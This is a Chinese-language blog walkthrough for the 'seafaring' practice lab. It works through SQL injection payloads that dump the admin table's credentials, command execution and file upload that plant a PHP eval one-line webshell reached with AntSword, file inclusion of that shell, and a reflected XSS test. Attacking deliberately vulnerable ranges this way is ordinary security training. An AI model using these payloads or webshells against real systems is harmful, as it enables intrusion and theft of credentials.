当前位置: 首页 > news >正文

seafaring靶场漏洞测试攻略

news 来源:原创 2024/9/19 9:41:52

打开网页

一.sql注入漏洞

1.输入框测试回显点

-1 union select 1,2,3#

2.查看数据库名

-1 union select 1,2,database()#

3.查看表名

-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='test'#

4.查看admin表中列名

-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='test' and table_name='admin'#

5.查看admin的账号和密码

-1 union select 1,2,group_concat(user_id,user_name,user_pass) from admin#

账号为admin,密码为mysql

二:命令执行漏洞

1.页面下方有一个执行框,输入ls查看

2.输入echo '<?php phpinfo();?>' > wff.php 访问wff.php

3.写入一句话木马,访问69.php

echo '<?php @eval($_POST['cmd']);?>' > 69.php

4.蚁剑连接

三:文件上传漏洞

1.使用 账号为admin,密码为mysql 登录网站后台,下方有一个上传文件的地方

2.上传php文件成功,尝试写入一句话木马到wff.php中上传

3.访问上传成功给的路径

4.蚁剑连接

四:文件包含漏洞

1.页面关于存在文件包含

2.通过访问之前写入的wff.php查看,远程文件包含关闭,本地文件可以访问

3.包含之前的69.php一句话木马,访问

4.蚁剑连接

五:反射型xss漏洞

1.登陆界面输入错误会回显在页面上

2.输入<script>alert(1)</script>,页面弹1

相关文章:

  • 北京网站建设多少钱?
  • 辽宁网页制作哪家好_网站建设
  • 高端品牌网站建设_汉中网站制作
  • 外观模式详解:如何为复杂系统构建简洁的接口
  • 【疑难杂症2024-005】docker-compose中设置容器的ip为固定ip后,服务无法启动
  • TCP 拥塞控制:一场网络数据的交通故事
  • 原生C++下模拟.Net平台的 DataTable,DataRow,只有部分功能,以后转Qt版和Python版。
  • 实战案例(5)防火墙通过跨三层MAC识别功能控制三层核心下面的终端
  • Linux(CentOS8)服务器安装RabbitMQ
  • Android DPC模式多开 APP
  • 力扣(leetcode)每日一题 1184 公交站间的距离
  • 为什么Node.js不适合CPU密集型应用?
  • 算法打卡:第十章 单调栈part01
  • 通过adb命令打开手机usb调试
  • Android Studio新建工程(Java语言环境)
  • 【建设方案】固定资产信息系统建设方案(功能清单列表2024word原件)
  • 9.12 TFTP通信
  • Leetcode面试经典150题-138.随机链表的复制
  • es6
  • HTTP中的ETag在移动客户端的应用
  • leetcode388. Longest Absolute File Path
  • Linux编程学习笔记 | Linux IO学习[1] - 文件IO
  • SAP云平台运行环境Cloud Foundry和Neo的区别
  • SpingCloudBus整合RabbitMQ
  • spring + angular 实现导出excel
  • 第2章 网络文档
  • 前端每日实战 2018 年 7 月份项目汇总(共 29 个项目)
  • 三栏布局总结
  • 收藏好这篇,别再只说“数据劫持”了
  • 王永庆:技术创新改变教育未来
  • 网页视频流m3u8/ts视频下载
  • 微信支付JSAPI,实测!终极方案
  • 与 ConTeXt MkIV 官方文档的接驳
  • 转载:[译] 内容加速黑科技趣谈
  • 阿里云ACE认证学习知识点梳理
  • 第二十章:异步和文件I/O.(二十三)
  • ​Z时代时尚SUV新宠:起亚赛图斯值不值得年轻人买?
  • ​第20课 在Android Native开发中加入新的C++类
  • ​学习一下,什么是预包装食品?​
  • #define用法
  • $.each()与$(selector).each()
  • (1)虚拟机的安装与使用,linux系统安装
  • (3) cmake编译多个cpp文件
  • (4)事件处理——(6)给.ready()回调函数传递一个参数(Passing an argument to the .ready() callback)...
  • (6)添加vue-cookie
  • (C语言版)链表(三)——实现双向链表创建、删除、插入、释放内存等简单操作...
  • (js)循环条件满足时终止循环
  • (php伪随机数生成)[GWCTF 2019]枯燥的抽奖
  • (八)五种元启发算法(DBO、LO、SWO、COA、LSO、KOA、GRO)求解无人机路径规划MATLAB
  • (编程语言界的丐帮 C#).NET MD5 HASH 哈希 加密 与JAVA 互通
  • (二) 初入MySQL 【数据库管理】
  • (三) prometheus + grafana + alertmanager 配置Redis监控
  • (十二)python网络爬虫(理论+实战)——实战:使用BeautfulSoup解析baidu热搜新闻数据
  • ***检测工具之RKHunter AIDE
  • .Net 4.0并行库实用性演练
  • .NET CF命令行调试器MDbg入门(一)
  • .NET DataGridView数据绑定说明
  • .NET Framework 的 bug?try-catch-when 中如果 when 语句抛出异常,程序将彻底崩溃